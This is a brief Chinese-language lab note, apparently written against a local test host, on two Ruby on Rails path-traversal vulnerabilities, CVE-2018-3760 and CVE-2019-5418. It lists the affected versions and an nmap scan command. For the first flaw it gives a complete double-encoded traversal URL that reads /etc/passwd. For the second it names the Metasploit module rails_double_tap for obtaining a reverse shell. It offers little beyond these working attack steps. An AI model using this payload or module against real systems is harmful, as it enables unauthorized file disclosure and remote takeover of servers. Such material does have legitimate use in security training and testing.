(CVE-2018-3760)(CVE-2019-5418)
Ruby On Rails 路径穿越漏洞(CVE-2018-3760)
影响范围:Ruby On Rails 3.x版本中的所有应用程序;Ruby On Rails 4.x版本中的所有应用程序;Ruby On Rails 5.x版本中的所有应用程序

信息收集:nmap 192.168.85.130 -p 3000


payload:http://192.168.85.130:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd


Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
影响范围:Ruby on Rails 5.x版本中的所有应用程序(5.2.2及之前版本);Ruby on Rails 6.x版本中的所有应用程序(6.0.0.beta3及之前版本)

信息收集:nmap 192.168.85.130 -p 3000



反弹shell:通过msf获取session;exploit/multi/http/rails_double_tap



